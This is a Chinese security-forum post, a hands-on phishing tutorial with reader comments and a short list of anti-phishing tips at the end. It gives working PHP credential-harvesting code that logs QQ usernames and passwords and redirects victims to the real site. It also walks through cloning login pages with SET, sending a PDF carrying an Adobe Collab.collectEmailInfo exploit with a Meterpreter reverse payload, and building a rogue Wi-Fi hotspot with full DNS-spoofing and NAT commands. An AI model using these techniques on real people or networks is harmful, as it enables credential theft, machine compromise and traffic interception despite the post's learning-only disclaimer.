用户
搜索

该用户从未签到

i春秋-呆萌菜鸟

Rank: 1

1

主题

3

帖子

22

魔法币
收听
0
粉丝
0
注册时间
2019-11-20
发表于 2019-12-24 15:20:54 33459
注:文章内容仅供参考学习,任何人不得用于非法测试。请遵守国家法律,做一个守法的良好公民。0x00 服务器端搭建的钓鱼页面
这种钓鱼页面,较为常见,攻击者注册与相关网站类似的域名,然后利用该网站的主页或登录页面进行诱骗,引诱被攻击者输入账号密码等个人信息。
这里利用手里闲置的阿里的一台服务器给大家做一下演示,构造一个简单的手机端钓鱼页面。
先来看一下后端的主要代码:
[PHP] 纯文本查看 复制代码
<?php
  if (isset($_POST["user"])) {
    if (isset($_POST["pass"])) {
      $myfile = fopen("fish.txt", "a") or die("Unable to open file!");
      $txt = "账号".$_POST["user"]." 密码".$_POST["pass"];
      fwrite($myfile, $txt);
      fclose($myfile);
      //在这里他完成输入之后进行跳转
      echo '<script>window.location.href="http://qzone.qq.com/"; </script>';//echo是输出函数,可以输出文本或者变量
    }
  }
?>
可以看到在被攻击者输入账号密码以后,信息被提交到同目录下的 fish.txt 中,然后进行网站的跳转,跳转到真实的 qq 空间页面。
QQ图片20191224145517.png
该页面的第一个选项是没有用的,用户只能点击第二个选项,然后跳转到如下页面。
QQ图片20191224145612.png
在手机端是看不出什么异常的,但是我们用电脑打开看看。
QQ图片20191224145655.png
在电脑端打开的网站,url 地址显示的是该钓鱼页面搭建的服务器域名和地址。
如果在这里我们输入了账号和密码,信息就会到 fist.txt 中。
而且如果你的手机有qq空间app的客户端,不管你输入什么,都是会直接跳转到你的空间的,在你没觉得有什么事情发生时,你的信息就已经泄露了。
QQ图片20191224145747.png
QQ图片20191224145842.png
0x01 用 kali set 生成的钓鱼网站
这里我们先来利用 社会工程学工具包 SET 中自带的模块来生成 goole 的钓鱼页面。
QQ图片20191224145920.png
2.png
3.png
生成以后我们访问该 ip 地址,可以看到是 goole 的登录页面,而且这个时候 kali 接受到一条访问 ip 的信息,我们尝试输入信息,点击登录,kail中就可以直接得到信息。
QQ图片20191224150121.png
4.png
在倒数第二步我们选择2.site clone ,还可以克隆其它页面。这里我又尝试了去克隆 qq 空间的登录页面。
不过这里我发现在你 qq 登录的情况下,钓鱼页面会直接进入真正的 qq 空间的登录页面,而且如果你使用快捷登录的方式或者扫码登录的方式,信息是不会被监听到的。
0x02 用 kali set 发送钓鱼邮件
这里我们尝试构造一个利用了 Adobe PDF 的 Collab.collectEmailInfo(堆溢出攻击) 漏洞,然后默认将 Metasploit 中的 Meterpreter 反向攻击荷载记载到 PDF 文件中,假如目标机中安装有 Adobe Acrobat ,且存在该漏洞,我们就可以在对方打开文件时,钓鱼成功。
下面是具体操作:
1.png
22.png
33.png
44.png
55.png
163邮箱的 SMTP 服务授权码设置见下:
66.png
邮件发送成功就像这样。
QQ图片20191224151052.png
但是,这个测试的时候,生成的带有 Payload 的附件,有时候会被检测出来。我们来查看这个报错返回了什么,报错状态码为 554,我们查看后面的链接可以看到是因为附件被163检测出来了。
5.png
6.png
0x04 利用钓鱼热点钓鱼
这次我们利用 kali 和一个无线网卡,来构造一个钓鱼热点,本地搭建 DNS 服务,修改 DNS 服务配置来欺骗受害者。
将 kali 与物理机进行桥接,与物理机在一个网段,然后插入无线网卡。
111.png
因为要启动 dhcp 服务,我们先给虚拟网卡 eth0 设置一个静态 ip 地址,
[AppleScript] 纯文本查看 复制代码
gedit /etc/network/interfaces

iface eth0 inet static //说明静态配置
auto eth0  //指定网卡
address 192.168.43.76 //配置静态ip
netmask 255.255.255.0 //子网掩码
gateway 192.168.43.1  //网关
重启 kali 的网络。之后我们将网卡 wlan0 设置为监听模式
[AppleScript] 纯文本查看 复制代码
ifconfig wlan0 down 
iwconfig wlan0 mode monitor 
ifconfig wlan0 up
222.png
接下来我们使用命令airbase-ng -e CICO -c 11 wlan0mon去创建 WIFI 。
333.png
保持该进程,重新打开一个终端,配置 wifi 网关。
[AppleScript] 纯文本查看 复制代码
ifconfig at0 up //启动新建的 at0 虚拟网卡

gedit /etc/network/interfaces

auto at0 
iface at0 inet static 
address 192.168.1.1 
netmask 255.255.255.0
重启 kali 的网络,可以看到 at0 已经有 ip 地址了。
555.png
接下来我们再来安装配置 dhcp 服务,没有该服务,手机无法连接钓鱼 wifi。
安装以后,我们设置一下网段,子网掩码,网关地址,默认 dns 服务器地址,配置如下:
[AppleScript] 纯文本查看 复制代码
gedit /etc/dhcp/dhcpd.conf

subnet 192.168.1.0 netmask 255.255.255.0 {    
  range 192.168.1.100 192.168.1.150;    
  option routers 192.168.1.1;    
  option subnet-mask 255.255.255.0;    
  option domain-name-servers 192.168.43.76; }
将 at0 指定为 dhcp 的网卡。
[AppleScript] 纯文本查看 复制代码
gedit /etc/default/isc-dhcp-server

INTERFACESv4 = 'at0'
123.png
重新启动 dhcp 服务。
下面我们来配置最重要的地方,就是 dns 服务,以 dnsmasq 为例,具体配置大家可以参考这篇文章。
https://sp4rkw.blog.csdn.net/article/details/101681716
我们之所以可以用该热点钓鱼成功就在于 dns 服务的配置,安装以后我们进行如下配置:
[AppleScript] 纯文本查看 复制代码
gedit /etc/dnsmasq.conf

resolv-file=/etc/resolv.conf 
strict-order  
listen-address=192.168.43.76
address=/baidu.com/47.**.**.** //将域名解析到如下地址,该例中我尝试将baidu.com的域名解析到我自己的服务器下。
server=8.8.8.8  
server=114.114.114.114
321.png
重启 dnsmasq 服务。
打开 linux 内核的转发模块,并用 iptables 进行规制编写,命令如下:
[AppleScript] 纯文本查看 复制代码
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 192.168.43.76
这里我们就完成了钓鱼热点的搭建,连上热点的手机访问百度的域名都会被解析到我的服务器地址......
0x05 避免钓鱼方法总结
(1.)不要随意连公共的 WIFI 网络。
(2.)涉及到账户,密码等个人信息的提交登录时,确保网络环境可信。
(3.)尽量不使用账号密码的登录方式登录。
(4.)垃圾或者来历不明的邮件附件不要查看。
(5.)别相信绝对安全。
注:文章内容仅供参考学习,任何人不得用于非法测试。请遵守国家法律,做一个守法的良好公民。
文章来源于公众号Admin team
好帖,顶了
My blog :http://www.e-wolf.top
使用道具 举报 回复
发表于 2019-12-26 19:05:59
师傅写的很好,厉害了
使用道具 举报 回复
我的公众号二维码呢,咋没了啊。
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册